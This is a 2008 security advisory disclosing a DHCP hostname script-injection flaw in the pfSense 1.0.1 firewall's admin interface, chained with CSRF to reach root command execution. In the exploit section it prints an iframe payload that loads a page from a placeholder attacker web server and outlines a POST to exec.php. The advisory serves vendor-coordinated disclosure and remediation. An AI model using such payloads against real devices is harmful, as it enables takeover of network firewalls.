MWR InfoSecurity Security Advisory. pfsense DHCP Script Injection Vulnerability. 25 th July 2008. Contents



Similar documents
MWR InfoSecurity Security Advisory. BT Home Hub SSID Script Injection Vulnerability. 10 th May Contents

Practical Exploitation Using A Malicious Service Set Identifier (SSID)

MWR InfoSecurity Advisory. Interwoven Worksite ActiveX Control Remote Code Execution. 10 th March Contents

WebView addjavascriptinterface Remote Code Execution 23/09/2013

Investigation of DHCP Packets using Wireshark

Security Research Advisory IBM inotes 9 Active Content Filtering Bypass

- The PIX OS Command-Line Interface -

Integrated Network Vulnerability Scanning & Penetration Testing SAINTcorporation.com

How to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering

Penetration Test Report

Detecting and Exploiting XSS with Xenotix XSS Exploit Framework

Sitefinity Security and Best Practices

External Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION

Cracking the Perimeter via Web Application Hacking. Zach Grace, CISSP, CEH January 17, Mega Conference

Basics of Internet Security

DHCP Server. Heng Sovannarith

Configuration of the DHCP server

Webapps Vulnerability Report

WPAD TECHNOLOGY WEAKNESSES. Sergey Rublev Expert in information security, "Positive Technologies"

Scaling the Network: Subnetting and Other Protocols. Networking CS 3470, Section 1

National Endowment for the Arts Evaluation Report. Table of Contents. Results of Evaluation Areas for Improvement Exit Conference...

WHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats

F-SECURE MESSAGING SECURITY GATEWAY

Bypassing Web Application Firewalls (WAFs) Ing. Pavol Lupták, CISSP, CEH Lead Security Consultant

8 Steps for Network Security Protection

8 Steps For Network Security Protection

Creating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011

CCNA Exploration: Accessing the WAN Chapter 7 Case Study

ANNEXURE-1 TO THE TENDER ENQUIRY NO.: DPS/AMPU/MIC/1896. Network Security Software Nessus- Technical Details

A DHCP Primer. Dario Laverde, 2002 Dario Laverde

Dynamic Host Configuration Protocol (DHCP) 02 NAT and DHCP Tópicos Avançados de Redes

Pwning Intranets with HTML5

Web Vulnerability Assessment Report

HOST AUTO CONFIGURATION (BOOTP, DHCP)

DNS Pinning and Web Proxies

Lab 5-5 Configuring the Cisco IOS DHCP Server

Chapter 12 Supporting Network Address Translation (NAT)

Secure Web Application Coding Team Introductory Meeting December 1, :00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda

Overview of the Penetration Test Implementation and Service. Peter Kanters

How to complete the Secure Internet Site Declaration (SISD) form

Bug Report. Date: March 19, 2011 Reporter: Chris Jarabek

Application Protocols for TCP/IP Administration

SECURITY ADVISORY. December 2008 Barracuda Load Balancer admin login Cross-site Scripting

Recommended Practice Case Study: Cross-Site Scripting. February 2007

Web Application Attacks And WAF Evasion

Web Authentication Application Note

IBM Protocol Analysis Module

Finding and Preventing Cross- Site Request Forgery. Tom Gallagher Security Test Lead, Microsoft

Make a folder named Lab3. We will be using Unix redirection commands to create several output files in that folder.

NETGEAR ProSAFE WC9500 High Capacity Wireless Controller

Information Technology Career Cluster Introduction to Cybersecurity Course Number:

OWASP TOP 10 ILIA

Hacking Intranet Websites from the Outside (Take 2) Fun With & Without JavaScript Malware

WEB SITE SECURITY. Jeff Aliber Verizon Digital Media Services

BASIC ANALYSIS OF TCP/IP NETWORKS

Check list for web developers

Web Application Security

Web applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh

Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs

1 Data information is sent onto the network cable using which of the following? A Communication protocol B Data packet

Security Vulnerabilities in SOHO Routers Craig Heffner, Derek Yap

MANAGED SECURITY TESTING

Security Advisory. Some IPS systems can be easily fingerprinted using simple techniques.

SonicWALL PCI 1.1 Implementation Guide

Where every interaction matters.

Web application security

SB 1386 / AB 1298 California State Senate Bill 1386 / Assembly Bill 1298

Application security testing: Protecting your application and data

Offensive Security. Advanced Web Attacks and Exploitation. Mati Aharoni Devon Kearns. v. 1.0

The Trivial Cisco IP Phones Compromise

Lecture Objectives. Lecture 6 Mobile Networks: Nomadic Services, DHCP, NAT, and VPNs. Agenda. Nomadic Services. Agenda. Nomadic Services Functions

HTTPParameter Pollution. ChrysostomosDaniel

We protect you applications! No, you don t. Digicomp Hacking Day 2013 May 16 th 2013

Contemporary Web Application Attacks. Ivan Pang Senior Consultant Edvance Limited

Still Aren't Doing. Frank Kim

Web Application Security. Vulnerabilities, Weakness and Countermeasures. Massimo Cotelli CISSP. Secure

A Decision Maker s Guide to Securing an IT Infrastructure

A Server and Browser-Transparent CSRF Defense for Web 2.0 Applications. Slides by Connor Schnaith

1 PC to WX64 direction connection with crossover cable or hub/switch

Evading Infrastructure Security Mohamed Bedewi Penetration Testing Consultant

Network Configuration Settings

Security Research Advisory SugarCRM Cross-Site Scripting Vulnerability

My FreeScan Vulnerabilities Report

Remote Attacks Against SOHO Routers. 08 February, 2010 Craig Heffner

THREAT VISIBILITY & VULNERABILITY ASSESSMENT

Appendix A: Configuring Firewalls for a VPN Server Running Windows Server 2003

Computer Networks CCNA Module 1

Hack Proof Your Webapps

Penetration Testing Report Client: Business Solutions June 15 th 2015

Efficient Addressing. Outline. Addressing Subnetting Supernetting CS 640 1

Lab Configuring the PIX Firewall as a DHCP Server

Security of Web Applications and Browsers: Challenges and Solutions

Company Co. Inc. LLC. LAN Domain Network Security Best Practices. An integrated approach to securing Company Co. Inc.

How To Manage Web Content Management System (Wcm)

Client logo placeholder XXX REPORT. Page 1 of 37

Bypassing NoScript Security Suite Using Cross-Site Scripting and MITM Attacks

Acunetix Website Audit. 5 November, Developer Report. Generated by Acunetix WVS Reporter (v8.0 Build )

Transcription:

Contents MWR InfoSecurity Security Advisory pfsense DHCP Script Injection Vulnerability 25 th July 2008 2008-07-25 Page 1 of 10

Contents Contents 1 Detailed Vulnerability Description... 5 1.1 Technical Background... 5 1.2 Overview of Vulnerability... 5 1.3 Exploit Information... 7 2 Recommendations... 9 3 References... 9 4 Acknowledgement... 9 2008-07-25 Page 2 of 10

pfsense Firewall DHCP Script Injection Vulnerability pfsense Firewall DHCP Script Injection Vulnerability Package Name: pfsense Open Source Firewall Date Discovered: January 2008 Affected Versions: Confirmed in Version 1.0.1 CVE Reference Author Severity Local/Remote Vulnerability Class Vendor Vendor Response Not Yet Assigned Rafael Dominguez Vega High Risk Remote Script Injection / Remote Code Execution pfsense http://www.pfsense.com/ A fix was implemented that resolves this issue. pfsense users updating to version 1.2 will not be affected. It should be noted that 1.0.x release is a deprecated version and therefore not longer recommended for use. Exploit Details Included Application Language Updates can be found in the following location:- http://www.pfsense.org/index.php?option=com_content& task=view&id=58&itemid=46 Yes PHP Overview: pfsense is a free, open source customized distribution of FreeBSD tailored for use as a firewall and router. (http://www.pfsense.org/) The pfsense firewall and router is intended to provide users with various functionality, such as VPN connectivity, load balancing, real time information, DHCP Server, etc. (http://www.pfsense.org/index.php?option=com_content&task=view&id=40&itemid=43) The pfsense firewall provides users with a DHCP server and the ability to manage it via an administrative web interface. This allows users to set up configuration options and view active DHCP leases. It should be noted that after this issue was identified, it was found that the vendor released an advisory in February 2008 titled pfsense Unspecified Cross-Site Scripting Vulnerabilities (http://www.securityfocus.com/bid/28072/info). The vulnerability discussed in the vendor advisory relates to an input validation issue; however, insufficient details were provided to confirm whether the vulnerability discussed in this advisory is the same issue. The reason for disclosing this advisory is to supplement the research outlined in the white paper titled Behind Enemy Lines. http://www.mwrinfosecurity.com/publications/mwri_behind-enemy-lines_2008-07-25.pdf 2008-07-25 Page 3 of 10

pfsense Firewall DHCP Script Injection Vulnerability Impact: The pfsense firewall administrative web interface has been identified as being vulnerable to a script injection attack that could allow remote attackers to execute commands on the target system with root privileges. An attacker must be in a position to obtain a DHCP lease from the target device. Cause: Exploitation of this vulnerability is possible because the pfsense firewall web interface does not properly sanitise parameters that are passed to it from the DHCP server. If a specially crafted DHCPREQUEST message containing malicious code in the Hostname DHCP Options field is sent to the pfsense s DHCP server; this will be displayed in the DHCP active leases page of the pfsense administrative interface and will be executed when an administrator visits this page. Interim Workaround: Remove the DHCP active leases page from the pfsense administrative interface and manage the DHCP server via the shell console. Solution: A fix was implemented that resolves this issue. It is recommended that users update to version 1.2 2008-07-25 Page 4 of 10

Detailed Vulnerability Description 1 Detailed Vulnerability Description 1.1 Technical Background DHCP (Dynamic Host Configuration Protocol), is a protocol that runs at the application level (TCP/IP OSI reference model) and which is used to assign dynamic IP addresses to devices on a network (http://www.ietf.org/rfc/rfc2131.txt).dhcp also enables the exchange of a series of TCP/IP configuration parameters (such as the subnet mask, default router, device host name, etc) between the DHCP server and the network device. In order to obtain a dynamic IP address, the network device must first send a DHCPDISCOVER message in order to find the DHCP server on the network. The server will respond by sending a DHCPOFFER message, containing the IP address that the server is offering (referred to as the IP lease offer ). The network device then broadcasts a DHCPREQUEST message in response to the IP lease offer received from the DHCP server. The DHCP options field of this message contains the Hostname of the network device. When the DHCP server receives the DHCPREQUEST from the network device, this responds with a DHCPACK message assigning the IP address to the network device and adding it to the list of active leases. 1.2 Overview of Vulnerability The pfsense web interface obtains information about the active leases from the DHCP server. An attacker connected to the same network on which the pfsense device is located could send a specially crafted DHCPREQUEST message containing a malicious payload in the DHCP Options Hostname field. This would then be passed from the DHCP server to the web interface and executed when the DHCP active leases page was visited by an administrator. The pfsense web interface runs with root privileges and the malicious code would be executed with these privileges. A screenshot of a JavaScript alert box being rendered on the DHCP leases page after a malicious DHCPREQUEST message was sent is included here: - 2008-07-25 Page 5 of 10

Detailed Vulnerability Description Figure 1: JavaScript rendered in the DHCP leases page. An example DHCPREQUEST message containing a malicious payload in the DHCP Options Hostname field is shown in the Wireshark capture below:- Figure 2: DHCPREQUEST Hostname field malicious payload. It should be noted that after this issue was identified, it was found that the vendor released an advisory in February 2008 titled pfsense Unspecified Cross-Site Scripting Vulnerabilities (http://www.securityfocus.com/bid/28072/info). The vulnerability discussed in the vendor advisory relates to an input validation issue; however, insufficient details were provided to confirm whether the vulnerability discussed in this advisory is the same issue. 2008-07-25 Page 6 of 10

Detailed Vulnerability Description The reason for disclosing this advisory is to supplement the research outlined in the white paper titled Behind Enemy Lines. http://www.mwrinfosecurity.com/publications/mwri_behind-enemy-lines_2008-07-25.pdf 1.3 Exploit Information It was possible to construct a proof of concept attack which could be used to execute arbitrary code remotely. This could, in turn, be used as the basis of an attack which gained access to a pfsense device with root privileges. One simple example of how fully compromise a device using this attack is outlined below. An attacker would send a specially crafted DHCPREQUEST message to a pfsense DHCP server. The DHCP message would contain a malicious payload in the DHCP Options Hostname field of the message. The injected code could be of the following form: - <iframe height=0 width=0 src='http://attacker-web-server/'> This payload is known to be executed in Mozilla Firefox web browser and will cause the user s browser to connect to the attacker s web server. This code would execute in the DHCP leases page and reference a malicious script located on a host under the attacker s control. Figure 3: Delivery of malicious script to Hostname field. The attacker's web server could then make a POST request to the command execution functionality provided by pfsense web interface (http://xxxxxx/exec.php) and execute the desired command using a Cross Site Request Forgery technique (http://www.owasp.org/index.php/top_10_2007-a5). 2008-07-25 Page 7 of 10

Detailed Vulnerability Description Figure 4: pfsense administrative interface command execution page. In this trivial example this would result in the whoami command being executed on the system. However, an attacker could alter this code to execute commands of their choosing, which could result in the remote compromise of the target system. 2008-07-25 Page 8 of 10

Recommendations 2 Recommendations A fix was implemented that resolves this issue. It is recommended that users update to version 1.2 It is recommended that any application vulnerable to DHCP script injection attacks is redesigned such that all user input is subject to strict input validation. All input variables must be checked against specific data types with all unauthorised input being rejected. An additional layer of protection should also be added by HTML encoding all data that is returned to the user. This would form part of a layered security model that provides greater defence against attacks that bypass input validation. Additionally, as an extra layer of security the application code should be modified to prevent CSRF attacks. The most effective method for achieving this is to use a one-time dynamic transaction ID for all requests sent to the server. 3 References pfsense Open Source Firewall http://www.pfsense.org/ pfsense Features page http://www.pfsense.org/index.php?option=com_content&task=view&id=40&itemid=43 rfc2131 - Dynamic Host Configuration Protocol http://www.ietf.org/rfc/rfc2131.txt Top 10 2007-Cross Site Request Forgery http://www.owasp.org/index.php/top_10_2007-a5 usefulfor.com/ruby - Net::DHCP http://usefulfor.com/ruby/2007/11/05/netdhcp/ Scapy http://www.secdev.org/projects/scapy/ Whitepaper: Behind Enemy Lines http://www.mwrinfosecurity.com/publications/mwri_behind-enemy-lines_2008-07-25.pdf 4 Acknowledgement MWR InfoSecurity would like to acknowledge pfsense for their co-operation in working with the author in regards to this matter and their pro-active approach to resolving the issue discussed here. 2008-07-25 Page 9 of 10

pfsense Firewall MWR DHCP InfoSecurity Script Injection Vulnerability St. Clement House 1-3 Alencon Link Basingstoke, RG21 7SB Tel: +44 (0)1256 300920 Fax: +44 (0)1256 844083 mwrinfosecurity.com 2008-07-25 Page 10 of 10

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information